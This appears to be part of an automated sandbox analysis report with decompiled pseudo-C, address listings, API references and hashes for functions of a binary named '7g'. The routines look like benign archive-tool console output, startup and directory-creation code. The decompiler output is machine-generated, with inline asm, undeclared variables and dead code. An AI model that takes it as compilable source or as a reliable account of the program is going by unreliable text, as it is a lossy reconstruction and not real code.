							}
						}
						if(_t165 != 0) {
							_t200 =  *(_t226 + 0xc4);
							if( *(_t226 + 0xc4) != 0) {
								L00B44F20(_t200, "WARNINGS:", _t165);
							}
							 *((intOrPtr*)(_t226 + 0x144)) =  *((intOrPtr*)(_t226 + 0x144)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x115)) = 1;
						}
						if( *((intOrPtr*)(_t223 + 0x28)) != 0) {
							_t166 =  *(_t226 + 0xc4);
							_t260 = _t166;
							if(_t166 != 0) {
								 *((intOrPtr*)(_t228 - 0x18)) =  *((intOrPtr*)(_t223 + 0x24));
								fputs("WARNINGS:",  *_t166);
								E00B11FE9(_t166);
								_push( *((intOrPtr*)(_t228 - 0x18)));
								E00B11FE9(L00B11FFC(_t166, _t260));
							}
							 *((intOrPtr*)(_t226 + 0x144)) =  *((intOrPtr*)(_t226 + 0x144)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x115)) = 1;
						}
						_t190 =  *(_t226 + 0xc4);
						if( *(_t226 + 0xc4) != 0) {
							E00B11FE9(_t190);
							if( *((char*)(_t226 + 0x15c)) != 0) {
								L00B11FDA( *(_t226 + 0xc4));
							}
						}
					}
					if( *((intOrPtr*)(_t223 + 0xc)) >= 0) {
						_t192 =  *(_t226 + 0xc4);
						_t224 = _t226 + 0xc4;
						_t265 =  *(_t226 + 0xc4);
						if( *(_t226 + 0xc4) != 0) {
							_push( *((intOrPtr*)(_t228 - 0x14)));
							L00B45030(_t192,  *((intOrPtr*)(_t228 + 8)), _t265);
							if( *((char*)(_t226 + 0x15c)) != 0) {
								L00B11FDA( *_t224);
							}
						}
						 *((char*)(_t226 + 0x115)) = 1;
					}
					 *(_t228 - 0x10) =  *(_t228 - 0x10) + 1;
				} while ( *(_t228 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xc)) + 4)));
				_t162 = 0;
				goto L44;
			}



















                                                                                                                    0x00b4514a
                                                                                                                    0x00b45154
                                                                                                                    0x00b45156
                                                                                                                    0x00b45158
                                                                                                                    0x00b4515f
                                                                                                                    0x00b45166
                                                                                                                    0x00b45171
                                                                                                                    0x00b45173
                                                                                                                    0x00b45176
                                                                                                                    0x00b4517c
                                                                                                                    0x00b4517f
                                                                                                                    0x00b45184
                                                                                                                    0x00b45187
                                                                                                                    0x00b45187
                                                                                                                    0x00b45171
                                                                                                                    0x00b4518d
                                                                                                                    0x00b45195
                                                                                                                    0x00b4519b
                                                                                                                    0x00b453da
                                                                                                                    0x00b453dd
                                                                                                                    0x00b45410
                                                                                                                    0x00b4541d
                                                                                                                    0x00b45420
                                                                                                                    0x00b45426
                                                                                                                    0x00b45428
                                                                                                                    0x00b4542a
                                                                                                                    0x00b4542a
                                                                                                                    0x00b4542f
                                                                                                                    0x00b45435
                                                                                                                    0x00b45437
                                                                                                                    0x00b454d6
                                                                                                                    0x00b454d6
                                                                                                                    0x00000000
                                                                                                                    0x00b4543d
                                                                                                                    0x00b4544b
                                                                                                                    0x00b4544f
                                                                                                                    0x00b45458
                                                                                                                    0x00b45463
                                                                                                                    0x00b45474
                                                                                                                    0x00b45479
                                                                                                                    0x00b4547b
                                                                                                                    0x00b454db
                                                                                                                    0x00b454e1
                                                                                                                    0x00b454e9
                                                                                                                    0x00b454e9
                                                                                                                    0x00b4547d
                                                                                                                    0x00b45480
                                                                                                                    0x00b45483
                                                                                                                    0x00b45485
                                                                                                                    0x00b4548b
                                                                                                                    0x00b454a7
                                                                                                                    0x00b454af
                                                                                                                    0x00b454ba
                                                                                                                    0x00b4548d
                                                                                                                    0x00b4549a
                                                                                                                    0x00b4549c
                                                                                                                    0x00b454c6
                                                                                                                    0x00b454c6
                                                                                                                    0x00b454d1
                                                                                                                    0x00000000
                                                                                                                    0x00b454d1
                                                                                                                    0x00b45437
                                                                                                                    0x00b453df
                                                                                                                    0x00b453e7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b453f3
                                                                                                                    0x00b453fa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b45406
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b451a1
                                                                                                                    0x00b451a1
                                                                                                                    0x00b451a9
                                                                                                                    0x00b451ac
                                                                                                                    0x00b451af
                                                                                                                    0x00b451b6
                                                                                                                    0x00b451b9
                                                                                                                    0x00b451bb
                                                                                                                    0x00b451bb
                                                                                                                    0x00b451c0
                                                                                                                    0x00b451cb
                                                                                                                    0x00b451d3
                                                                                                                    0x00b451d5
                                                                                                                    0x00b451de
                                                                                                                    0x00b451ed
                                                                                                                    0x00b451f8
                                                                                                                    0x00b451f8
                                                                                                                    0x00b451de
                                                                                                                    0x00b451ff
                                                                                                                    0x00b45201
                                                                                                                    0x00b45209
                                                                                                                    0x00b45211
                                                                                                                    0x00b45211
                                                                                                                    0x00b45216
                                                                                                                    0x00b45223
                                                                                                                    0x00b45227
                                                                                                                    0x00b45227
                                                                                                                    0x00b45232
                                                                                                                    0x00b45234
                                                                                                                    0x00b4523a
                                                                                                                    0x00b4523c
                                                                                                                    0x00b45243
                                                                                                                    0x00b4524b
                                                                                                                    0x00b45255
                                                                                                                    0x00b4525a
                                                                                                                    0x00b45266
                                                                                                                    0x00b45266
                                                                                                                    0x00b4526b
                                                                                                                    0x00b45278
                                                                                                                    0x00b4527c
                                                                                                                    0x00b4527c
                                                                                                                    0x00b45283
                                                                                                                    0x00b4528b
                                                                                                                    0x00b4528d
                                                                                                                    0x00b45298
                                                                                                                    0x00b45298
                                                                                                                    0x00b4528b
                                                                                                                    0x00b4529f
                                                                                                                    0x00b452a4
                                                                                                                    0x00b452a8
                                                                                                                    0x00b452b3
                                                                                                                    0x00b452bb
                                                                                                                    0x00b452bd
                                                                                                                    0x00b452c6
                                                                                                                    0x00b452d5
                                                                                                                    0x00b452e0
                                                                                                                    0x00b452e0
                                                                                                                    0x00b452c6
                                                                                                                    0x00b452e7
                                                                                                                    0x00b452e9
                                                                                                                    0x00b452f1
                                                                                                                    0x00b452f9
                                                                                                                    0x00b452f9
                                                                                                                    0x00b452fe
                                                                                                                    0x00b4530b
                                                                                                                    0x00b4530f
                                                                                                                    0x00b4530f
                                                                                                                    0x00b4531a
                                                                                                                    0x00b4531c
                                                                                                                    0x00b45322
                                                                                                                    0x00b45324
                                                                                                                    0x00b4532b
                                                                                                                    0x00b45333
                                                                                                                    0x00b4533d
                                                                                                                    0x00b45342
                                                                                                                    0x00b4534e
                                                                                                                    0x00b4534e
                                                                                                                    0x00b45353
                                                                                                                    0x00b45360
                                                                                                                    0x00b45364
                                                                                                                    0x00b45364
                                                                                                                    0x00b4536b
                                                                                                                    0x00b45373
                                                                                                                    0x00b45375
                                                                                                                    0x00b45381
                                                                                                                    0x00b45389
                                                                                                                    0x00b45389
                                                                                                                    0x00b45381
                                                                                                                    0x00b45373
                                                                                                                    0x00b45392
                                                                                                                    0x00b45394
                                                                                                                    0x00b4539a
                                                                                                                    0x00b453a0
                                                                                                                    0x00b453a2
                                                                                                                    0x00b453a4
                                                                                                                    0x00b453aa
                                                                                                                    0x00b453b6
                                                                                                                    0x00b453ba
                                                                                                                    0x00b453ba
                                                                                                                    0x00b453b6
                                                                                                                    0x00b453bf
                                                                                                                    0x00b453bf
                                                                                                                    0x00b453c6
                                                                                                                    0x00b453cf
                                                                                                                    0x00b453d8
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4514A
                                                                                                                    • fputs.MSVCRT ref: 00B4524B
                                                                                                                      • Part of subcall function 00B4B618: fputs.MSVCRT ref: 00B4B681
                                                                                                                    • fputs.MSVCRT ref: 00B45333
                                                                                                                    • fputs.MSVCRT ref: 00B4544B
                                                                                                                    • fputs.MSVCRT ref: 00B4549A
                                                                                                                      • Part of subcall function 00B11FDA: fflush.MSVCRT ref: 00B11FDC
                                                                                                                      • Part of subcall function 00B11FFC: __EH_prolog.LIBCMT ref: 00B12001
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog$fflushfree
                                                                                                                    • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                                                                                                    • API String ID: 1750297421-1898165966
                                                                                                                    • Opcode ID: 0bab62cf1baf901db080d694f26aa56458dd69437335091ab70ac8e95237308a
                                                                                                                    • Instruction ID: 23907c68a9b81215b574c2bdeb3a4f8d02275efd71122c800d827881d1e99871
                                                                                                                    • Opcode Fuzzy Hash: 0bab62cf1baf901db080d694f26aa56458dd69437335091ab70ac8e95237308a
                                                                                                                    • Instruction Fuzzy Hash: 79B17C30601F059FDB34EF64C9A1BEAB7E1FF44300F0449ADE65A57292CB70AA85DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B45552 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 971 b45552-b4557e __EH_prolog EnterCriticalSection 972 b45580-b45585 call b4b618 971->972 973 b4559b-b455a3 971->973 977 b4558a-b45598 972->977 975 b455a5 call b11fda 973->975 976 b455aa-b455af 973->976 975->976 979 b455b5-b455c1 976->979 980 b4567e-b45694 976->980 977->973 981 b45603-b4561b 979->981 982 b455c3-b455c9 979->982 983 b4572d 980->983 984 b4569a-b456a0 980->984 987 b4561d-b4562e call b11fe9 981->987 988 b4565f-b45667 981->988 982->981 985 b455cb-b455d7 982->985 989 b4572f-b45746 LeaveCriticalSection 983->989 984->983 986 b456a6-b456ae 984->986 992 b455df-b455ed 985->992 993 b455d9 985->993 991 b4571f-b4572b call b4574e 986->991 994 b456b0-b456d2 call b11fe9 fputs 986->994 987->988 1001 b45630-b45658 fputs call b1224a 987->1001 990 b4566d-b45673 988->990 988->991 990->991 996 b45679 990->996 991->989 992->988 998 b455ef-b45601 fputs 992->998 993->992 1009 b456d4-b456e5 fputs 994->1009 1010 b456e7-b45703 call b23c23 call b11ffc call b11e89 994->1010 1002 b4571a call b11fda 996->1002 1004 b4565a call b11fe9 998->1004 1001->1004 1002->991 1004->988 1013 b45708-b45714 call b11fe9 1009->1013 1010->1013 1013->1002
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00B45552(void* __ecx) {
				void* __edi;
				intOrPtr* _t65;
				intOrPtr _t76;
				struct _IO_FILE** _t91;
				struct _CRITICAL_SECTION* _t97;
				struct _IO_FILE** _t99;
				struct _IO_FILE** _t102;
				void* _t104;
				intOrPtr _t105;
				void* _t107;

				L00B7F140(0xb85fc4, _t107);
				_t97 = 0xb9a878;
				_t104 = __ecx;
				 *(_t107 - 0x10) = 0xb9a878;
				EnterCriticalSection(0xb9a878);
				 *((intOrPtr*)(_t107 - 4)) = 0;
				if( *((intOrPtr*)(_t104 + 0xb8)) != 0) {
					E00B4B618(_t104 + 0x14, 0xb9a878, 1); // executed
					 *((intOrPtr*)(_t104 + 0x30)) = 0;
					 *((char*)( *((intOrPtr*)(_t104 + 0x2c)))) = 0;
					 *((intOrPtr*)(_t104 + 0x3c)) = 0;
					 *((short*)( *((intOrPtr*)(_t104 + 0x38)))) = 0;
				}
				_t75 =  *(_t104 + 0xc4);
				if( *(_t104 + 0xc4) != 0) {
					L00B11FDA(_t75);
				}
				_t76 =  *((intOrPtr*)(_t107 + 8));
				if(_t76 != 0) {
					 *((intOrPtr*)(_t104 + 0x12c)) =  *((intOrPtr*)(_t104 + 0x12c)) + 1;
					asm("adc [eax+0x4], ebx");
					__eflags = _t76 - 0x80004004;
					if(_t76 == 0x80004004) {
						L27:
						_t105 = _t76;
					} else {
						__eflags = _t76 - 0x80070070;
						if(_t76 == 0x80070070) {
							goto L27;
						} else {
							_t99 =  *(_t104 + 0xc8);
							__eflags = _t99;
							if(_t99 != 0) {
								E00B11FE9(_t99);
								fputs( *0xb8c1e0,  *_t99);
								__eflags =  *((intOrPtr*)(_t107 + 8)) - 0x8007000e;
								if( *((intOrPtr*)(_t107 + 8)) != 0x8007000e) {
									_push( *((intOrPtr*)(L00B23C23())));
									 *((char*)(_t107 - 4)) = 1;
									E00B11E89(L00B11FFC( *(_t104 + 0xc8), __eflags),  *((intOrPtr*)(_t107 - 0x1c)));
								} else {
									fputs( *0xb8c1f4,  *( *(_t104 + 0xc8)));
								}
								E00B11FE9( *(_t104 + 0xc8));
								_t85 =  *(_t104 + 0xc8);
								goto L25;
							}
							goto L26;
						}
					}
				} else {
					if(( *(_t104 + 0x154) |  *(_t104 + 0x158)) != 0 ||  *((intOrPtr*)(_t104 + 0x114)) != 0) {
						 *((intOrPtr*)(_t104 + 0x12c)) =  *((intOrPtr*)(_t104 + 0x12c)) + 1;
						asm("adc [eax+0x4], ebx");
						_t87 =  *(_t104 + 0xc4);
						__eflags =  *(_t104 + 0xc4);
						if( *(_t104 + 0xc4) != 0) {
							E00B11FE9(_t87);
							__eflags =  *(_t104 + 0x154) |  *(_t104 + 0x158);
							if(( *(_t104 + 0x154) |  *(_t104 + 0x158)) != 0) {
								_t101 =  *(_t104 + 0xc4);
								fputs("Sub items Errors: ",  *( *(_t104 + 0xc4)));
								_t91 = E00B1224A(_t101,  *(_t104 + 0x154),  *(_t104 + 0x158));
								goto L14;
							}
						}
					} else {
						_t65 = _t104 + 0x134;
						if( *((intOrPtr*)(_t104 + 0x115)) == 0) {
							_t65 = _t104 + 0x11c;
						}
						 *_t65 =  *_t65 + 1;
						asm("adc [eax+0x4], ebx");
						_t102 =  *(_t104 + 0xc4);
						if(_t102 != 0) {
							fputs( *0xb8c200,  *_t102); // executed
							_t91 = _t102;
							L14:
							E00B11FE9(_t91);
						}
					}
					_t85 =  *(_t104 + 0xc4);
					if( *(_t104 + 0xc4) != 0 &&  *((intOrPtr*)(_t104 + 0x15c)) != 0) {
						L25:
						L00B11FDA(_t85);
					}
					L26:
					_t105 = L00B4574E();
					_t97 = 0xb9a878;
				}
				LeaveCriticalSection(_t97);
				 *[fs:0x0] =  *((intOrPtr*)(_t107 - 0xc));
				return _t105;
			}













                                                                                                                    0x00b45557
                                                                                                                    0x00b45562
                                                                                                                    0x00b45567
                                                                                                                    0x00b4556a
                                                                                                                    0x00b4556d
                                                                                                                    0x00b4557b
                                                                                                                    0x00b4557e
                                                                                                                    0x00b45585
                                                                                                                    0x00b4558d
                                                                                                                    0x00b45590
                                                                                                                    0x00b45595
                                                                                                                    0x00b45598
                                                                                                                    0x00b45598
                                                                                                                    0x00b4559b
                                                                                                                    0x00b455a3
                                                                                                                    0x00b455a5
                                                                                                                    0x00b455a5
                                                                                                                    0x00b455aa
                                                                                                                    0x00b455af
                                                                                                                    0x00b4567e
                                                                                                                    0x00b4568b
                                                                                                                    0x00b4568e
                                                                                                                    0x00b45694
                                                                                                                    0x00b4572d
                                                                                                                    0x00b4572d
                                                                                                                    0x00b4569a
                                                                                                                    0x00b4569a
                                                                                                                    0x00b456a0
                                                                                                                    0x00000000
                                                                                                                    0x00b456a6
                                                                                                                    0x00b456a6
                                                                                                                    0x00b456ac
                                                                                                                    0x00b456ae
                                                                                                                    0x00b456b2
                                                                                                                    0x00b456c5
                                                                                                                    0x00b456cb
                                                                                                                    0x00b456d2
                                                                                                                    0x00b456ef
                                                                                                                    0x00b456f7
                                                                                                                    0x00b45703
                                                                                                                    0x00b456d4
                                                                                                                    0x00b456e2
                                                                                                                    0x00b456e4
                                                                                                                    0x00b4570f
                                                                                                                    0x00b45714
                                                                                                                    0x00000000
                                                                                                                    0x00b45714
                                                                                                                    0x00000000
                                                                                                                    0x00b456ae
                                                                                                                    0x00b456a0
                                                                                                                    0x00b455b5
                                                                                                                    0x00b455c1
                                                                                                                    0x00b45603
                                                                                                                    0x00b45610
                                                                                                                    0x00b45613
                                                                                                                    0x00b45619
                                                                                                                    0x00b4561b
                                                                                                                    0x00b4561d
                                                                                                                    0x00b45628
                                                                                                                    0x00b4562e
                                                                                                                    0x00b45630
                                                                                                                    0x00b4563d
                                                                                                                    0x00b45658
                                                                                                                    0x00000000
                                                                                                                    0x00b45658
                                                                                                                    0x00b4562e
                                                                                                                    0x00b455cb
                                                                                                                    0x00b455d1
                                                                                                                    0x00b455d7
                                                                                                                    0x00b455d9
                                                                                                                    0x00b455d9
                                                                                                                    0x00b455df
                                                                                                                    0x00b455e2
                                                                                                                    0x00b455e5
                                                                                                                    0x00b455ed
                                                                                                                    0x00b455f7
                                                                                                                    0x00b455ff
                                                                                                                    0x00b4565a
                                                                                                                    0x00b4565a
                                                                                                                    0x00b4565a
                                                                                                                    0x00b455ed
                                                                                                                    0x00b4565f
                                                                                                                    0x00b45667
                                                                                                                    0x00b4571a
                                                                                                                    0x00b4571a
                                                                                                                    0x00b4571a
                                                                                                                    0x00b4571f
                                                                                                                    0x00b45724
                                                                                                                    0x00b45726
                                                                                                                    0x00b45726
                                                                                                                    0x00b45730
                                                                                                                    0x00b4573e
                                                                                                                    0x00b45746

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B45557
                                                                                                                    • EnterCriticalSection.KERNEL32(00B9A878), ref: 00B4556D
                                                                                                                    • fputs.MSVCRT ref: 00B455F7
                                                                                                                    • LeaveCriticalSection.KERNEL32(00B9A878), ref: 00B45730
                                                                                                                      • Part of subcall function 00B4B618: fputs.MSVCRT ref: 00B4B681
                                                                                                                    • fputs.MSVCRT ref: 00B4563D
                                                                                                                      • Part of subcall function 00B1224A: fputs.MSVCRT ref: 00B12267
                                                                                                                    • fputs.MSVCRT ref: 00B456C5
                                                                                                                    • fputs.MSVCRT ref: 00B456E2
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                                                                                                    • String ID: Sub items Errors:
                                                                                                                    • API String ID: 2670240366-2637271492
                                                                                                                    • Opcode ID: 0cdf2eb9e712754bf8ef5fa5d459c486a657160b7746e2d6603dde9a102f24c0
                                                                                                                    • Instruction ID: bae7a23c10f1a82050df7ab0d4d13601e72cf6805a12c7a84f32b44b424208f4
                                                                                                                    • Opcode Fuzzy Hash: 0cdf2eb9e712754bf8ef5fa5d459c486a657160b7746e2d6603dde9a102f24c0
                                                                                                                    • Instruction Fuzzy Hash: BC518D31500E40DFCB34AF64D895AE9B7E2FF44310F5548AEE15B97262DB306D85DB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B7F5BD Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E00B7F5BD(void* __eflags) {
				void* _t13;
				void _t15;
				int _t22;
				intOrPtr* _t23;
				intOrPtr _t27;
				void* _t30;
				void* _t33;

				_t33 = __eflags;
				__setusermatherr(0xb7f686);
				L00B7F674(_t13);
				_push(0xb9a0a4);
				_push(0xb9a0a0);
				L00B7F66E();
				_t15 =  *0xb9ca34; // 0x0
				 *(_t30 - 0x28) = _t15;
				__getmainargs(_t30 - 0x1c, _t30 - 0x2c, _t30 - 0x20,  *0xb9ca30, _t30 - 0x28);
				_push(0xb9a09c);
				_push(0xb9a000);
				L00B7F66E();
				 *(__p___initenv()) =  *(_t30 - 0x20);
				_push( *(_t30 - 0x20));
				_push( *(_t30 - 0x2c));
				_push( *(_t30 - 0x1c));
				_t22 = L00B4B0CC(_t33); // executed
				 *(_t30 - 0x24) = _t22;
				exit(_t22); // executed
				_t23 =  *((intOrPtr*)(_t30 - 0x14));
				_t27 =  *((intOrPtr*)( *_t23));
				 *((intOrPtr*)(_t30 - 0x30)) = _t27;
				_push(_t23);
				_push(_t27);
				L00B7F668();
				return _t23;
			}










                                                                                                                    0x00b7f5bd
                                                                                                                    0x00b7f5c2
                                                                                                                    0x00b7f5c9
                                                                                                                    0x00b7f5ce
                                                                                                                    0x00b7f5d3
                                                                                                                    0x00b7f5d8
                                                                                                                    0x00b7f5dd
                                                                                                                    0x00b7f5e2
                                                                                                                    0x00b7f5fb
                                                                                                                    0x00b7f601
                                                                                                                    0x00b7f606
                                                                                                                    0x00b7f60b
                                                                                                                    0x00b7f619
                                                                                                                    0x00b7f61b
                                                                                                                    0x00b7f61e
                                                                                                                    0x00b7f621
                                                                                                                    0x00b7f624
                                                                                                                    0x00b7f62c
                                                                                                                    0x00b7f630
                                                                                                                    0x00b7f636
                                                                                                                    0x00b7f63b
                                                                                                                    0x00b7f63d
                                                                                                                    0x00b7f640
                                                                                                                    0x00b7f641
                                                                                                                    0x00b7f642
                                                                                                                    0x00b7f649

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 279829931-0
                                                                                                                    • Opcode ID: c073c1baa92e7c582f82460794f3deeaccbaa7c3f673b73cf71237147ce5fe10
                                                                                                                    • Instruction ID: d16ebde345c857b59f72e62da8b0d725b4f50f7924c82ab269c8ac2247da486f
                                                                                                                    • Opcode Fuzzy Hash: c073c1baa92e7c582f82460794f3deeaccbaa7c3f673b73cf71237147ce5fe10
                                                                                                                    • Instruction Fuzzy Hash: CE01937590420AEFCF05ABE0DC49CEE7BB9FB49710B1440AAF516B3270DA359910DB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B15C70 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1042 b15c70-b15c92 __EH_prolog call b18760 1045 b15cb5-b15cb7 1042->1045 1046 b15c94-b15c9f CreateDirectoryW 1042->1046 1047 b15d4b-b15d52 GetLastError 1045->1047 1048 b15cbd-b15cdc call b12d90 call b18869 1045->1048 1049 b15ca1-b15ca3 1046->1049 1050 b15ca8-b15caf GetLastError 1046->1050 1052 b15d54-b15d56 1047->1052 1053 b15d58-b15d82 call b16529 call b12d90 call b169ab 1047->1053 1062 b15d3e-b15d4a call b11e89 1048->1062 1063 b15cde-b15ceb CreateDirectoryW 1048->1063 1054 b15d9c-b15daa 1049->1054 1050->1045 1050->1047 1052->1054 1073 b15d84-b15d86 1053->1073 1074 b15d88-b15d8e 1053->1074 1062->1047 1065 b15cf1-b15cf8 GetLastError 1063->1065 1066 b15ced-b15cef 1063->1066 1070 b15cfa-b15cfc 1065->1070 1071 b15cfe-b15d21 call b16529 call b12d90 call b169ab 1065->1071 1069 b15d39-b15d3c 1066->1069 1075 b15d94-b15d9a call b11e89 1069->1075 1070->1069 1085 b15d23-b15d25 1071->1085 1086 b15d27-b15d2d 1071->1086 1077 b15d91 1073->1077 1074->1077 1075->1054 1077->1075 1087 b15d30-b15d38 call b11e89 1085->1087 1086->1087 1087->1069
                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E00B15C70(WCHAR* __ecx) {
				signed char _t34;
				signed int _t35;
				int _t42;
				signed char _t48;
				void* _t67;
				WCHAR* _t70;
				void* _t72;

				L00B7F140(E00B82DC3, _t72);
				_t70 = __ecx;
				_t67 = E00B18760(__ecx);
				if(_t67 == 1) {
					L4:
					if(_t67 == 0) {
						L16:
						if(GetLastError() == 0xb7) {
							E00B16529(_t72 - 0x88);
							E00B12D90(_t72 - 0x60);
							_push(0);
							_push(_t70);
							 *(_t72 - 4) = 2;
							if(E00B169AB(_t72 - 0x88) != 0) {
								_t48 =  *(_t72 - 0x68) >> 0x00000004 & 0x00000001;
							} else {
								_t48 = 0;
							}
							_push( *((intOrPtr*)(_t72 - 0x60)));
							L22:
							E00B11E89(_t32);
							_t34 = _t48;
							L23:
							 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
							return _t34;
						}
						_t34 = 0;
						goto L23;
					}
					_t35 = E00B12D90(_t72 - 0x18);
					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
					if(E00B18869(_t70, _t72 - 0x18, _t72, _t35 & 0xffffff00 | _t67 != 0x00000001) == 0) {
						 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
						E00B11E89(_t37,  *(_t72 - 0x18));
						goto L16;
					}
					if(CreateDirectoryW( *(_t72 - 0x18), 0) == 0) {
						if(GetLastError() == 0xb7) {
							E00B16529(_t72 - 0x50);
							E00B12D90(_t72 - 0x28);
							_push(0);
							_push( *(_t72 - 0x18));
							 *(_t72 - 4) = 1;
							if(E00B169AB(_t72 - 0x50) != 0) {
								_t48 =  *(_t72 - 0x30) >> 0x00000004 & 0x00000001;
							} else {
								_t48 = 0;
							}
							_t32 = E00B11E89(_t41,  *((intOrPtr*)(_t72 - 0x28)));
						} else {
							_t48 = 0;
						}
					} else {
						_t48 = 1;
					}
					_push( *(_t72 - 0x18));
					goto L22;
				}
				_t42 = CreateDirectoryW(__ecx, 0); // executed
				if(_t42 == 0) {
					if(GetLastError() == 0xb7) {
						goto L16;
					}
					goto L4;
				}
				_t34 = 1;
				goto L23;
			}










                                                                                                                    0x00b15c75
                                                                                                                    0x00b15c80
                                                                                                                    0x00b15c8d
                                                                                                                    0x00b15c92
                                                                                                                    0x00b15cb5
                                                                                                                    0x00b15cb7
                                                                                                                    0x00b15d4b
                                                                                                                    0x00b15d52
                                                                                                                    0x00b15d5e
                                                                                                                    0x00b15d66
                                                                                                                    0x00b15d6b
                                                                                                                    0x00b15d6d
                                                                                                                    0x00b15d74
                                                                                                                    0x00b15d82
                                                                                                                    0x00b15d8e
                                                                                                                    0x00b15d84
                                                                                                                    0x00b15d84
                                                                                                                    0x00b15d84
                                                                                                                    0x00b15d91
                                                                                                                    0x00b15d94
                                                                                                                    0x00b15d94
                                                                                                                    0x00b15d9a
                                                                                                                    0x00b15d9c
                                                                                                                    0x00b15da2
                                                                                                                    0x00b15daa
                                                                                                                    0x00b15daa
                                                                                                                    0x00b15d54
                                                                                                                    0x00000000
                                                                                                                    0x00b15d54
                                                                                                                    0x00b15cc0
                                                                                                                    0x00b15cc5
                                                                                                                    0x00b15cdc
                                                                                                                    0x00b15d41
                                                                                                                    0x00b15d45
                                                                                                                    0x00000000
                                                                                                                    0x00b15d4a
                                                                                                                    0x00b15ceb
                                                                                                                    0x00b15cf8
                                                                                                                    0x00b15d01
                                                                                                                    0x00b15d09
                                                                                                                    0x00b15d0e
                                                                                                                    0x00b15d13
                                                                                                                    0x00b15d16
                                                                                                                    0x00b15d21
                                                                                                                    0x00b15d2d
                                                                                                                    0x00b15d23
                                                                                                                    0x00b15d23
                                                                                                                    0x00b15d23
                                                                                                                    0x00b15d33
                                                                                                                    0x00b15cfa
                                                                                                                    0x00b15cfa
                                                                                                                    0x00b15cfa
                                                                                                                    0x00b15ced
                                                                                                                    0x00b15ced
                                                                                                                    0x00b15ced
                                                                                                                    0x00b15d39
                                                                                                                    0x00000000
                                                                                                                    0x00b15d39
                                                                                                                    0x00b15c97
